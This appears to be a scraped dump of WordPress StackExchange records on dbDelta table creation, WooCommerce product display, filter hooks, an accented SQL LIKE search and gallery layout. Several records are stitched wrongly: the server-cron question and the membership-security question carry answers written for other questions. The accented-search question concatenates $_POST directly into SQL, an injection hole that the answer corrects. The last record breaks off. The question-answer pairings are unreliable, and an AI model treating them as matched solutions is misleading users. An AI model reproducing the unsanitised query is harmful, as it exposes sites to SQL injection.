"text": "<p>That's not how you create tables with <code>dbDelta</code>. <code>dbDelta</code> expects an SQL statement as its argument, but the code in your question passes none. What's more, the SQL is passed into <code>wpdb->query</code>, and has no checks or sanitisation. A quick run of PHPCS would reveal warnings that no prepare call is used.</p>\n<p>Instead, the official documentation at <a href=\"https://developer.wordpress.org/reference/functions/dbdelta/\" rel=\"nofollow noreferrer\">https://developer.wordpress.org/reference/functions/dbdelta/</a> has this example:</p>\n<pre class=\"lang-php prettyprint-override\"><code>global $wpdb;\n$table_name = $wpdb->prefix . 'dbdelta_test_001';\n$wpdb_collate = $wpdb->collate;\n$sql =\n"CREATE TABLE {$table_name} (\n id mediumint(8) unsigned NOT NULL auto_increment ,\n first varchar(255) NULL,\n PRIMARY KEY (id),\n KEY first (first)\n )\n COLLATE {$wpdb_collate}";\n \nrequire_once(ABSPATH . 'wp-admin/includes/upgrade.php');\ndbDelta( $sql );\n</code></pre>\n<p>Note however, that <code>dbDelta</code> has <em><strong>extremely</strong></em> specific formatting requirements. For example, there must be 2 spaces after <code>PRIMARY KEY</code>. <code>dbDelta</code> will also adjust existing tables to match the statement, and it will create the table if it doesn't exist</p>\n<p>Also keep in mind that in a lot of cases custom post types are easier and more performant. In this case, a CPT + taxonomy might be more performant in some circumstances due to the absence of indexes on the custom tables, and the loss of the internal WP_Cache system</p>\n"
},
{
"answer_id": 376870,
"author": "Emanuel Schiavoni",
"author_id": 196358,
"author_profile": "https://wordpress.stackexchange.com/users/196358",
"pm_score": -1,
"selected": true,
"text": "<p>Finally I found the solution, and as I expected, the error was stupid, simply for some reason that I unknow, the names of the tables must be defined obligatorily within the function, even if you use global $ ... it won't work, you have to define them inside.</p>\n<p>The correct function was something like this:</p>\n<pre><code>$table_name_clientes = $wpdb->prefix . 'clientes';\n$table_name_promociones = $wpdb->prefix . 'promociones';\n\n$charset_collate = $wpdb->get_charset_collate();\n\n$sql_clientes = "CREATE TABLE IF NOT EXISTS $table_name_clientes (\n id tinyint NOT NULL,\n logo text NOT NULL,\n name text NOT NULL,\n whatsapp text DEFAULT '' NOT NULL,\n instagram text DEFAULT '' NOT NULL,\n facebook text DEFAULT '' NOT NULL,\n PRIMARY KEY (id)\n) $charset_collate ENGINE = InnoDB;";\n\n$sql_promociones = "CREATE TABLE IF NOT EXISTS $table_name_promociones (\n id tinyint NOT NULL,\n img text NOT NULL,\n title text NOT NULL,\n content text NOT NULL,\n owner tinyint NOT NULL,\n contact tinyint NOT NULL,\n PRIMARY KEY (id),\n FOREIGN KEY (owner) REFERENCES $table_name_clientes(id) ON DELETE CASCADE ON UPDATE CASCADE\n) $charset_collate ENGINE = InnoDB;";\n\nrequire_once( ABSPATH . 'wp-admin/includes/upgrade.php' );\ndbDelta( $sql_clientes );\ndbDelta( $sql_promociones );\n</code></pre>\n"
}
] | 2020/10/20 | [
"https://wordpress.stackexchange.com/questions/376827",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/196358/"
] | I tried creating the tables in different ways and I always get the same error:
*"Error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '( ...... at line 1 of the WordPress database for the CREATE TABLE IF NOT query EXISTS"*
```
require_once( ABSPATH . 'wp-admin/includes/upgrade.php' );
global $wpdb, $rs_plugin_db_version, $table_name_clientes, $table_name_promociones;
$charset_collate = $wpdb->get_charset_collate();
$wpdb->query(
"CREATE TABLE IF NOT EXISTS $table_name_clientes (
id int(11) NOT NULL,
logo text NOT NULL,
name text NOT NULL,
whatsapp text DEFAULT '' NOT NULL,
instagram text DEFAULT '' NOT NULL,
facebook text DEFAULT '' NOT NULL,
PRIMARY KEY (id)
) $charset_collate ENGINE = InnoDB"
);
dbDelta();
$wpdb->query(
"CREATE TABLE IF NOT EXISTS $table_name_promociones (
id int(11) NOT NULL,
img text NOT NULL,
title text NOT NULL,
content text NOT NULL,
owner int(11) NOT NULL,
contact int(11) NOT NULL,
PRIMARY KEY (id),
FOREIGN KEY (owner) REFERENCES $table_name_clientes(id) ON DELETE CASCADE ON UPDATE CASCADE
) $charset_collate ENGINE = InnoDB"
);
dbDelta();
```
In one of the tables I need to create a foreign key, if I didn't misunderstood dbDelta() does not support them and therefore my last attempt was with $wpdb->query, but with or without foreign key the result is the same.
maybe my mistake is obvious, but honestly I can't find it | Finally I found the solution, and as I expected, the error was stupid, simply for some reason that I unknow, the names of the tables must be defined obligatorily within the function, even if you use global $ ... it won't work, you have to define them inside.
The correct function was something like this:
```
$table_name_clientes = $wpdb->prefix . 'clientes';
$table_name_promociones = $wpdb->prefix . 'promociones';
$charset_collate = $wpdb->get_charset_collate();
$sql_clientes = "CREATE TABLE IF NOT EXISTS $table_name_clientes (
id tinyint NOT NULL,
logo text NOT NULL,
name text NOT NULL,
whatsapp text DEFAULT '' NOT NULL,
instagram text DEFAULT '' NOT NULL,
facebook text DEFAULT '' NOT NULL,
PRIMARY KEY (id)
) $charset_collate ENGINE = InnoDB;";
$sql_promociones = "CREATE TABLE IF NOT EXISTS $table_name_promociones (
id tinyint NOT NULL,
img text NOT NULL,
title text NOT NULL,
content text NOT NULL,
owner tinyint NOT NULL,
contact tinyint NOT NULL,
PRIMARY KEY (id),
FOREIGN KEY (owner) REFERENCES $table_name_clientes(id) ON DELETE CASCADE ON UPDATE CASCADE
) $charset_collate ENGINE = InnoDB;";
require_once( ABSPATH . 'wp-admin/includes/upgrade.php' );
dbDelta( $sql_clientes );
dbDelta( $sql_promociones );
``` |
376,919 | <p>We want to move a CRON job from being triggered in WordPress to a server-based job. Right now the code lives in the <em>functions.php</em> file in our WP theme, and we use the WPCrontrol plugin for scheduling. It runs fine, no problem there. The issue is the code has WooCommerce hooks in it. A server-based job has no idea what to do with <code>WC_Orders</code>, for example. How can we resolve this?</p>
| [
{
"answer_id": 376830,
"author": "Tom J Nowell",
"author_id": 736,
"author_profile": "https://wordpress.stackexchange.com/users/736",
"pm_score": 1,
"selected": false,
"text": "<p>That's not how you create tables with <code>dbDelta</code>. <code>dbDelta</code> expects an SQL statement as its argument, but the code in your question passes none. What's more, the SQL is passed into <code>wpdb->query</code>, and has no checks or sanitisation. A quick run of PHPCS would reveal warnings that no prepare call is used.</p>\n<p>Instead, the official documentation at <a href=\"https://developer.wordpress.org/reference/functions/dbdelta/\" rel=\"nofollow noreferrer\">https://developer.wordpress.org/reference/functions/dbdelta/</a> has this example:</p>\n<pre class=\"lang-php prettyprint-override\"><code>global $wpdb;\n$table_name = $wpdb->prefix . 'dbdelta_test_001';\n$wpdb_collate = $wpdb->collate;\n$sql =\n"CREATE TABLE {$table_name} (\n id mediumint(8) unsigned NOT NULL auto_increment ,\n first varchar(255) NULL,\n PRIMARY KEY (id),\n KEY first (first)\n )\n COLLATE {$wpdb_collate}";\n \nrequire_once(ABSPATH . 'wp-admin/includes/upgrade.php');\ndbDelta( $sql );\n</code></pre>\n<p>Note however, that <code>dbDelta</code> has <em><strong>extremely</strong></em> specific formatting requirements. For example, there must be 2 spaces after <code>PRIMARY KEY</code>. <code>dbDelta</code> will also adjust existing tables to match the statement, and it will create the table if it doesn't exist</p>\n<p>Also keep in mind that in a lot of cases custom post types are easier and more performant. In this case, a CPT + taxonomy might be more performant in some circumstances due to the absence of indexes on the custom tables, and the loss of the internal WP_Cache system</p>\n"
},
{
"answer_id": 376870,
"author": "Emanuel Schiavoni",
"author_id": 196358,
"author_profile": "https://wordpress.stackexchange.com/users/196358",
"pm_score": -1,
"selected": true,
"text": "<p>Finally I found the solution, and as I expected, the error was stupid, simply for some reason that I unknow, the names of the tables must be defined obligatorily within the function, even if you use global $ ... it won't work, you have to define them inside.</p>\n<p>The correct function was something like this:</p>\n<pre><code>$table_name_clientes = $wpdb->prefix . 'clientes';\n$table_name_promociones = $wpdb->prefix . 'promociones';\n\n$charset_collate = $wpdb->get_charset_collate();\n\n$sql_clientes = "CREATE TABLE IF NOT EXISTS $table_name_clientes (\n id tinyint NOT NULL,\n logo text NOT NULL,\n name text NOT NULL,\n whatsapp text DEFAULT '' NOT NULL,\n instagram text DEFAULT '' NOT NULL,\n facebook text DEFAULT '' NOT NULL,\n PRIMARY KEY (id)\n) $charset_collate ENGINE = InnoDB;";\n\n$sql_promociones = "CREATE TABLE IF NOT EXISTS $table_name_promociones (\n id tinyint NOT NULL,\n img text NOT NULL,\n title text NOT NULL,\n content text NOT NULL,\n owner tinyint NOT NULL,\n contact tinyint NOT NULL,\n PRIMARY KEY (id),\n FOREIGN KEY (owner) REFERENCES $table_name_clientes(id) ON DELETE CASCADE ON UPDATE CASCADE\n) $charset_collate ENGINE = InnoDB;";\n\nrequire_once( ABSPATH . 'wp-admin/includes/upgrade.php' );\ndbDelta( $sql_clientes );\ndbDelta( $sql_promociones );\n</code></pre>\n"
}
] | 2020/10/21 | [
"https://wordpress.stackexchange.com/questions/376919",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/196430/"
] | We want to move a CRON job from being triggered in WordPress to a server-based job. Right now the code lives in the *functions.php* file in our WP theme, and we use the WPCrontrol plugin for scheduling. It runs fine, no problem there. The issue is the code has WooCommerce hooks in it. A server-based job has no idea what to do with `WC_Orders`, for example. How can we resolve this? | Finally I found the solution, and as I expected, the error was stupid, simply for some reason that I unknow, the names of the tables must be defined obligatorily within the function, even if you use global $ ... it won't work, you have to define them inside.
The correct function was something like this:
```
$table_name_clientes = $wpdb->prefix . 'clientes';
$table_name_promociones = $wpdb->prefix . 'promociones';
$charset_collate = $wpdb->get_charset_collate();
$sql_clientes = "CREATE TABLE IF NOT EXISTS $table_name_clientes (
id tinyint NOT NULL,
logo text NOT NULL,
name text NOT NULL,
whatsapp text DEFAULT '' NOT NULL,
instagram text DEFAULT '' NOT NULL,
facebook text DEFAULT '' NOT NULL,
PRIMARY KEY (id)
) $charset_collate ENGINE = InnoDB;";
$sql_promociones = "CREATE TABLE IF NOT EXISTS $table_name_promociones (
id tinyint NOT NULL,
img text NOT NULL,
title text NOT NULL,
content text NOT NULL,
owner tinyint NOT NULL,
contact tinyint NOT NULL,
PRIMARY KEY (id),
FOREIGN KEY (owner) REFERENCES $table_name_clientes(id) ON DELETE CASCADE ON UPDATE CASCADE
) $charset_collate ENGINE = InnoDB;";
require_once( ABSPATH . 'wp-admin/includes/upgrade.php' );
dbDelta( $sql_clientes );
dbDelta( $sql_promociones );
``` |
376,992 | <p>I am using below function to display product information in Shop Page.</p>
<pre><code>function woocommerce_template_loop_product_title() {
echo '<h5 class="' . esc_attr( apply_filters( 'woocommerce_product_loop_title_classes', 'woocommerce-loop-product__title' ) ) . '">' . get_the_title() . ' </h5>';
echo '<p>' . get_the_excerpt() . '</p>';
}
</code></pre>
<p>I can fetch product <strong>shot description</strong> using <code>get_the_excerpt()</code>. But I would like to fetch all product information like size, price, color.</p>
<p>I can see below information in Product page.</p>
<p><a href="https://i.stack.imgur.com/pKSoz.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/pKSoz.png" alt="enter image description here" /></a></p>
<p>I would like to fetch these information in Shop page with all products.</p>
<p>How can I fetch all product information ?</p>
| [
{
"answer_id": 376993,
"author": "HK89",
"author_id": 179278,
"author_profile": "https://wordpress.stackexchange.com/users/179278",
"pm_score": 0,
"selected": false,
"text": "<p>The Complete woocommerce Product Description add in shop page.</p>\n<pre><code> add_action( 'woocommerce_after_shop_loop_item_title', \n 'wc_add_short_description' );\n\n function wc_add_short_description() {\n global $product;\n\n ?>\n <div itemprop="description">\n <?php echo apply_filters( 'woocommerce_short_description', $product->post-> post_excerpt ) ?>\n </div>\n <?php\n}\n</code></pre>\n<p>This code add in function.php file</p>\n"
},
{
"answer_id": 377024,
"author": "HK89",
"author_id": 179278,
"author_profile": "https://wordpress.stackexchange.com/users/179278",
"pm_score": 1,
"selected": false,
"text": "<p>Product Attributes without Variation Don't Display in Shop page & Product Page</p>\n<p>Add Attribute and Variations in Product ( <a href=\"https://docs.woocommerce.com/document/variable-product/\" rel=\"nofollow noreferrer\">Refer blog</a> )</p>\n<blockquote>\n<p>Note : Product variations is Used Only Variable Product.</p>\n</blockquote>\n<p>And Then after put this code in function.php</p>\n<pre><code> add_action( 'woocommerce_after_shop_loop_item_title', 'bbloomer_echo_stock_variations_loop' );\n\nfunction bbloomer_echo_stock_variations_loop(){\n global $product;\n if ( $product->get_type() == 'variable' ) {\n foreach ( $product->get_available_variations() as $key ) {\n $attr_string = array();\n foreach ( $key['attributes'] as $attr_name => $attr_value ) {\n $attr_string[] = $attr_value;\n $arr_names[] = $attr_name;\n }\n\n $attr_color = $arr_names[0];\n $attr_size = $arr_names[1];\n $strle = 'attribute_pa_';\n\n $attr_name_a = substr($attr_color, strlen($strle));\n $attr_name_a2 = substr($attr_size, strlen($strle));\n\n \n if ( $key['max_qty'] > 0 ) { \n echo '<div><p>' .$attr_name_a.' : '.$attr_string[0].' , '.$attr_name_a2.' : '.$attr_string[1].' , ' . $key['max_qty'] . ' in stock</p></div>'; \n } else { \n echo '<div><p>' .$attr_name_a.' : '. $attr_string[0].',' .$attr_name_a2.' : '.$attr_string[1].' out of stock</p></div>'; \n }\n }\n }\n}\n</code></pre>\n<p>Look Like Below image :</p>\n<p><a href=\"https://i.stack.imgur.com/slgec.png\" rel=\"nofollow noreferrer\"><img src=\"https://i.stack.imgur.com/slgec.png\" alt=\"enter image description here\" /></a></p>\n"
}
] | 2020/10/23 | [
"https://wordpress.stackexchange.com/questions/376992",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/104698/"
] | I am using below function to display product information in Shop Page.
```
function woocommerce_template_loop_product_title() {
echo '<h5 class="' . esc_attr( apply_filters( 'woocommerce_product_loop_title_classes', 'woocommerce-loop-product__title' ) ) . '">' . get_the_title() . ' </h5>';
echo '<p>' . get_the_excerpt() . '</p>';
}
```
I can fetch product **shot description** using `get_the_excerpt()`. But I would like to fetch all product information like size, price, color.
I can see below information in Product page.
[](https://i.stack.imgur.com/pKSoz.png)
I would like to fetch these information in Shop page with all products.
How can I fetch all product information ? | Product Attributes without Variation Don't Display in Shop page & Product Page
Add Attribute and Variations in Product ( [Refer blog](https://docs.woocommerce.com/document/variable-product/) )
>
> Note : Product variations is Used Only Variable Product.
>
>
>
And Then after put this code in function.php
```
add_action( 'woocommerce_after_shop_loop_item_title', 'bbloomer_echo_stock_variations_loop' );
function bbloomer_echo_stock_variations_loop(){
global $product;
if ( $product->get_type() == 'variable' ) {
foreach ( $product->get_available_variations() as $key ) {
$attr_string = array();
foreach ( $key['attributes'] as $attr_name => $attr_value ) {
$attr_string[] = $attr_value;
$arr_names[] = $attr_name;
}
$attr_color = $arr_names[0];
$attr_size = $arr_names[1];
$strle = 'attribute_pa_';
$attr_name_a = substr($attr_color, strlen($strle));
$attr_name_a2 = substr($attr_size, strlen($strle));
if ( $key['max_qty'] > 0 ) {
echo '<div><p>' .$attr_name_a.' : '.$attr_string[0].' , '.$attr_name_a2.' : '.$attr_string[1].' , ' . $key['max_qty'] . ' in stock</p></div>';
} else {
echo '<div><p>' .$attr_name_a.' : '. $attr_string[0].',' .$attr_name_a2.' : '.$attr_string[1].' out of stock</p></div>';
}
}
}
}
```
Look Like Below image :
[](https://i.stack.imgur.com/slgec.png) |
377,027 | <p>I know it´s not clearly a technical question, I did not find on the Web (maybe my location makes the job harder).</p>
<p>I have to develop a private member space.</p>
<p>It´s easier for me to use the wordpress backup (wp-admin folder) with reduced rights(capabilities) for subscribers (eg. access to his invoices ) but I´m little scary to make problems of security (like from subscriber, create a door to enter in administration and hack the website finding easier the admin login/password).</p>
<p>Most of plugins of membership use a custom private space only on front-end for members.</p>
<p>Is it safe to use the default wordpress back-end for members or make a private member space only on front-end is a better way to do that ( excluding the question of user interface customizing ) ?</p>
| [
{
"answer_id": 376993,
"author": "HK89",
"author_id": 179278,
"author_profile": "https://wordpress.stackexchange.com/users/179278",
"pm_score": 0,
"selected": false,
"text": "<p>The Complete woocommerce Product Description add in shop page.</p>\n<pre><code> add_action( 'woocommerce_after_shop_loop_item_title', \n 'wc_add_short_description' );\n\n function wc_add_short_description() {\n global $product;\n\n ?>\n <div itemprop="description">\n <?php echo apply_filters( 'woocommerce_short_description', $product->post-> post_excerpt ) ?>\n </div>\n <?php\n}\n</code></pre>\n<p>This code add in function.php file</p>\n"
},
{
"answer_id": 377024,
"author": "HK89",
"author_id": 179278,
"author_profile": "https://wordpress.stackexchange.com/users/179278",
"pm_score": 1,
"selected": false,
"text": "<p>Product Attributes without Variation Don't Display in Shop page & Product Page</p>\n<p>Add Attribute and Variations in Product ( <a href=\"https://docs.woocommerce.com/document/variable-product/\" rel=\"nofollow noreferrer\">Refer blog</a> )</p>\n<blockquote>\n<p>Note : Product variations is Used Only Variable Product.</p>\n</blockquote>\n<p>And Then after put this code in function.php</p>\n<pre><code> add_action( 'woocommerce_after_shop_loop_item_title', 'bbloomer_echo_stock_variations_loop' );\n\nfunction bbloomer_echo_stock_variations_loop(){\n global $product;\n if ( $product->get_type() == 'variable' ) {\n foreach ( $product->get_available_variations() as $key ) {\n $attr_string = array();\n foreach ( $key['attributes'] as $attr_name => $attr_value ) {\n $attr_string[] = $attr_value;\n $arr_names[] = $attr_name;\n }\n\n $attr_color = $arr_names[0];\n $attr_size = $arr_names[1];\n $strle = 'attribute_pa_';\n\n $attr_name_a = substr($attr_color, strlen($strle));\n $attr_name_a2 = substr($attr_size, strlen($strle));\n\n \n if ( $key['max_qty'] > 0 ) { \n echo '<div><p>' .$attr_name_a.' : '.$attr_string[0].' , '.$attr_name_a2.' : '.$attr_string[1].' , ' . $key['max_qty'] . ' in stock</p></div>'; \n } else { \n echo '<div><p>' .$attr_name_a.' : '. $attr_string[0].',' .$attr_name_a2.' : '.$attr_string[1].' out of stock</p></div>'; \n }\n }\n }\n}\n</code></pre>\n<p>Look Like Below image :</p>\n<p><a href=\"https://i.stack.imgur.com/slgec.png\" rel=\"nofollow noreferrer\"><img src=\"https://i.stack.imgur.com/slgec.png\" alt=\"enter image description here\" /></a></p>\n"
}
] | 2020/10/23 | [
"https://wordpress.stackexchange.com/questions/377027",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/128094/"
] | I know it´s not clearly a technical question, I did not find on the Web (maybe my location makes the job harder).
I have to develop a private member space.
It´s easier for me to use the wordpress backup (wp-admin folder) with reduced rights(capabilities) for subscribers (eg. access to his invoices ) but I´m little scary to make problems of security (like from subscriber, create a door to enter in administration and hack the website finding easier the admin login/password).
Most of plugins of membership use a custom private space only on front-end for members.
Is it safe to use the default wordpress back-end for members or make a private member space only on front-end is a better way to do that ( excluding the question of user interface customizing ) ? | Product Attributes without Variation Don't Display in Shop page & Product Page
Add Attribute and Variations in Product ( [Refer blog](https://docs.woocommerce.com/document/variable-product/) )
>
> Note : Product variations is Used Only Variable Product.
>
>
>
And Then after put this code in function.php
```
add_action( 'woocommerce_after_shop_loop_item_title', 'bbloomer_echo_stock_variations_loop' );
function bbloomer_echo_stock_variations_loop(){
global $product;
if ( $product->get_type() == 'variable' ) {
foreach ( $product->get_available_variations() as $key ) {
$attr_string = array();
foreach ( $key['attributes'] as $attr_name => $attr_value ) {
$attr_string[] = $attr_value;
$arr_names[] = $attr_name;
}
$attr_color = $arr_names[0];
$attr_size = $arr_names[1];
$strle = 'attribute_pa_';
$attr_name_a = substr($attr_color, strlen($strle));
$attr_name_a2 = substr($attr_size, strlen($strle));
if ( $key['max_qty'] > 0 ) {
echo '<div><p>' .$attr_name_a.' : '.$attr_string[0].' , '.$attr_name_a2.' : '.$attr_string[1].' , ' . $key['max_qty'] . ' in stock</p></div>';
} else {
echo '<div><p>' .$attr_name_a.' : '. $attr_string[0].',' .$attr_name_a2.' : '.$attr_string[1].' out of stock</p></div>';
}
}
}
}
```
Look Like Below image :
[](https://i.stack.imgur.com/slgec.png) |
377,040 | <p>I have this apply filter in my plugin.</p>
<pre><code>$pre_html = apply_filters( 'events_views_html', null, $view_slug, $query, $context );
</code></pre>
<p>I want to change <code>$view_slug</code> value dynamically from child theme using <code>add_filter</code> because I do not want to modify plugin files. But this code is not working. It is displaying value of <code>$view_slug</code> instead of displaying complete page content.</p>
<pre><code>function add_extra_val( $view_slug, $query, $context ){
if (is_singular('tribe_events')) {
$view_slug = 'single-event';
}
return $view_slug;
}
add_filter('events_views_html', 'add_extra_val', 10, 3);
</code></pre>
<p>It is a basic question but I have limited knowledge of WordPress filters and hooks. Some guidelines regarding this will be appreciated.</p>
| [
{
"answer_id": 377157,
"author": "Yash Tiwari",
"author_id": 185348,
"author_profile": "https://wordpress.stackexchange.com/users/185348",
"pm_score": 0,
"selected": false,
"text": "<pre><code>Below is an example to modified the value using the add_filter hook:\n\n// Accepting two arguments (three possible).\nfunction example_callback( $view_slug, $query ) {\n ...\n return $maybe_modified_value;\n}\nadd_filter( 'events_views_html', 'example_callback', 10, 2 ); // Where $priority is 10, $accepted_args is 2.\n</code></pre>\n"
},
{
"answer_id": 377183,
"author": "vancoder",
"author_id": 26778,
"author_profile": "https://wordpress.stackexchange.com/users/26778",
"pm_score": 1,
"selected": false,
"text": "<p>Filters only allow you to directly modify the <strong>first</strong> value passed to them. In your case, that's <code>null</code>. If you shifted <code>view_slug</code> up a place, it would be available to filters using your <code>events_view_html</code> tag.</p>\n<pre><code>add_filter( 'events_view_html', 'my_callback', 10, 3); // passing 3 args to the callback, assuming you need them for something.\n\nfunction my_callback( $view_slug, $query, $context ) {\n// Do whatever you need to do to $view_slug\n// $query and $context can be read but not changed\nreturn $view_slug;\n}\n</code></pre>\n"
}
] | 2020/10/23 | [
"https://wordpress.stackexchange.com/questions/377040",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/120693/"
] | I have this apply filter in my plugin.
```
$pre_html = apply_filters( 'events_views_html', null, $view_slug, $query, $context );
```
I want to change `$view_slug` value dynamically from child theme using `add_filter` because I do not want to modify plugin files. But this code is not working. It is displaying value of `$view_slug` instead of displaying complete page content.
```
function add_extra_val( $view_slug, $query, $context ){
if (is_singular('tribe_events')) {
$view_slug = 'single-event';
}
return $view_slug;
}
add_filter('events_views_html', 'add_extra_val', 10, 3);
```
It is a basic question but I have limited knowledge of WordPress filters and hooks. Some guidelines regarding this will be appreciated. | Filters only allow you to directly modify the **first** value passed to them. In your case, that's `null`. If you shifted `view_slug` up a place, it would be available to filters using your `events_view_html` tag.
```
add_filter( 'events_view_html', 'my_callback', 10, 3); // passing 3 args to the callback, assuming you need them for something.
function my_callback( $view_slug, $query, $context ) {
// Do whatever you need to do to $view_slug
// $query and $context can be read but not changed
return $view_slug;
}
``` |
377,074 | <p>I'm trying to do an SQL query and I don't understand something. I get a value with <code>$ _POST</code>, this value is equal to 'définition'. I made this request:
<code>$sql = "SELECT DISTINCT * FROM". $ wpdb-> prefix. "posts WHERE post_title LIKE '%". $ _POST ['value']. "% '";</code>.</p>
<p>A <code>var_dump($sql)</code> gives <code>"SELECT DISTINCT * FROM datatablename.posts WHERE post_title LIKE '% definition%'";</code>.</p>
<p>If I do <code>$res = $wpdb->get_results($sql);</code>, I get an empty array</p>
<p>But, if in my code I put directly <code>$sql = "SELECT DISTINCT * FROM datatablename.posts WHERE post_title LIKE '% definition%'";</code> (I immediately replace <code>$_POST</code> with my value), <code>$res</code> is an array with a post.</p>
<p>The problem stems from the accent, because if <code>$_POST['value'] = 'finition'</code> it's okay</p>
<p>My data table is in <code>utf8mb4_unicode_ci</code>.</p>
<p>What can be done to solve this problem?</p>
| [
{
"answer_id": 377659,
"author": "Sally CJ",
"author_id": 137402,
"author_profile": "https://wordpress.stackexchange.com/users/137402",
"pm_score": 2,
"selected": true,
"text": "<p>Your SQL command is highly <strong>insecure</strong> and open to security issues like SQL injection, so even if this may not answer the question, I strongly suggest you to use <a href=\"https://developer.wordpress.org/reference/classes/wpdb/prepare/\" rel=\"nofollow noreferrer\"><code>$wpdb->prepare()</code></a> and <a href=\"https://developer.wordpress.org/reference/classes/wpdb/esc_like/\" rel=\"nofollow noreferrer\"><code>$wpdb->esc_like()</code></a> — the latter is used to escape the <code>%</code> character in SQL.</p>\n<p>Additionally, you can simply use <code>$wpdb->posts</code> to output the table name for WordPress posts such as <code>wp_posts</code>.</p>\n<p>And I noticed that in your SQL command:</p>\n<ul>\n<li><p>The table name is incorrect because the <code>FROM</code> and <code>$wpdb->prefix</code> is concatenated as one word like <code>FROMwp_posts</code>.</p>\n</li>\n<li><p>There's a whitespace after the second <code>%</code> in the <code>LIKE</code> clause: <code>%". $_POST['value']. "% '</code> — so that whitespace is probably not needed? Or that it could be the reason why the query did not return any results.</p>\n</li>\n<li><p>The <code>var_dump()</code> actually contains no accent — you used <code>definition</code> and not <code>définition</code>. Same goes with the direct one.</p>\n</li>\n</ul>\n<p>Now here's how your query or SQL command should be generated:</p>\n<pre class=\"lang-php prettyprint-override\"><code>$value = $_POST['value'] ?? '';\n\n// wrapped for brevity\n$sql = $wpdb->prepare( "\nSELECT DISTINCT *\nFROM {$wpdb->posts}\nWHERE post_title LIKE %s\n", '%' . $wpdb->esc_like( $value ) . '%' );\n\n$res = $wpdb->get_results( $sql );\n</code></pre>\n<p>And I actually tested the above code with a post with the title containing the word <code>définition</code>, and the query returned one result (which is a test post).</p>\n<p>If my code doesn't work for you, you can try <a href=\"https://developer.wordpress.org/reference/functions/sanitize_text_field/\" rel=\"nofollow noreferrer\"><code>sanitize_text_field()</code></a>, but that will strip HTML tags, among other things.</p>\n"
},
{
"answer_id": 377863,
"author": "Q Studio",
"author_id": 7968,
"author_profile": "https://wordpress.stackexchange.com/users/7968",
"pm_score": 0,
"selected": false,
"text": "<p>Here is a function to query posts with title "like" - returning either IDs or specified columns - escaping both the passed title and any requested column values:</p>\n<pre><code>/**\n* Get post with title %like% search term\n*\n* @param $title Post title to search for\n* @param $method wpdb method to use to retrieve results\n* @param $columns Array of column rows to retrieve\n*\n* @since 0.3\n* @return Mixed Array || False\n*/\nfunction posts_with_title_like( $title = null, $method = 'get_col', $columns = array ( 'ID' ) ){\n\n // sanity check ##\n if ( ! $title ) { return false; }\n\n // global $wpdb ##\n global $wpdb;\n\n // First escape the $columns, since we don't use it with $wpdb->prepare() ##\n $columns = \\esc_sql( $columns );\n\n // now implode the values, if it's an array ##\n if( is_array( $columns ) ){\n $columns = implode( ', ', $columns ); // e.g. "ID, post_title" ##\n }\n\n // run query ##\n $results = $wpdb->$method (\n $wpdb->prepare (\n "\n SELECT $columns\n FROM $wpdb->posts\n WHERE {$wpdb->posts}.post_title LIKE %s\n "\n , \\esc_sql( '%'.$wpdb->esc_like( trim( $title ) ).'%' )\n )\n );\n\n #var_dump( $results );\n\n // return results or false ##\n return $results ? $results : false ;\n\n}\n</code></pre>\n"
}
] | 2020/10/24 | [
"https://wordpress.stackexchange.com/questions/377074",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/195214/"
] | I'm trying to do an SQL query and I don't understand something. I get a value with `$ _POST`, this value is equal to 'définition'. I made this request:
`$sql = "SELECT DISTINCT * FROM". $ wpdb-> prefix. "posts WHERE post_title LIKE '%". $ _POST ['value']. "% '";`.
A `var_dump($sql)` gives `"SELECT DISTINCT * FROM datatablename.posts WHERE post_title LIKE '% definition%'";`.
If I do `$res = $wpdb->get_results($sql);`, I get an empty array
But, if in my code I put directly `$sql = "SELECT DISTINCT * FROM datatablename.posts WHERE post_title LIKE '% definition%'";` (I immediately replace `$_POST` with my value), `$res` is an array with a post.
The problem stems from the accent, because if `$_POST['value'] = 'finition'` it's okay
My data table is in `utf8mb4_unicode_ci`.
What can be done to solve this problem? | Your SQL command is highly **insecure** and open to security issues like SQL injection, so even if this may not answer the question, I strongly suggest you to use [`$wpdb->prepare()`](https://developer.wordpress.org/reference/classes/wpdb/prepare/) and [`$wpdb->esc_like()`](https://developer.wordpress.org/reference/classes/wpdb/esc_like/) — the latter is used to escape the `%` character in SQL.
Additionally, you can simply use `$wpdb->posts` to output the table name for WordPress posts such as `wp_posts`.
And I noticed that in your SQL command:
* The table name is incorrect because the `FROM` and `$wpdb->prefix` is concatenated as one word like `FROMwp_posts`.
* There's a whitespace after the second `%` in the `LIKE` clause: `%". $_POST['value']. "% '` — so that whitespace is probably not needed? Or that it could be the reason why the query did not return any results.
* The `var_dump()` actually contains no accent — you used `definition` and not `définition`. Same goes with the direct one.
Now here's how your query or SQL command should be generated:
```php
$value = $_POST['value'] ?? '';
// wrapped for brevity
$sql = $wpdb->prepare( "
SELECT DISTINCT *
FROM {$wpdb->posts}
WHERE post_title LIKE %s
", '%' . $wpdb->esc_like( $value ) . '%' );
$res = $wpdb->get_results( $sql );
```
And I actually tested the above code with a post with the title containing the word `définition`, and the query returned one result (which is a test post).
If my code doesn't work for you, you can try [`sanitize_text_field()`](https://developer.wordpress.org/reference/functions/sanitize_text_field/), but that will strip HTML tags, among other things. |
377,083 | <p>I'm trying to understand why whitespace appears between the main product image and the product gallery on this page: <a href="http://etica.co.nz/product/mini-icosidodecahedron-ring-bearer-box/" rel="nofollow noreferrer">http://etica.co.nz/product/mini-icosidodecahedron-ring-bearer-box/</a></p>
<p>Clicking on the middle image will remove the whitespace.</p>
<p>Why would it be doing this?</p>
<p>Cheers</p>
| [
{
"answer_id": 377095,
"author": "HK89",
"author_id": 179278,
"author_profile": "https://wordpress.stackexchange.com/users/179278",
"pm_score": 0,
"selected": false,
"text": "<p>Your issue is flex slider in This page.</p>\n<p>Put This script in footer.php</p>\n<pre><code><script type="text/javascript">\n \n jQuery(document).ready(function(){\n \n jQuery('.flex-viewport').css('height', 525);\n\n jQuery('.flex-control-nav li').on('click',function(){\n \n jQuery('.flex-viewport').css('height', 525);\n });\n\n});\n\n</script>\n</code></pre>\n"
},
{
"answer_id": 377174,
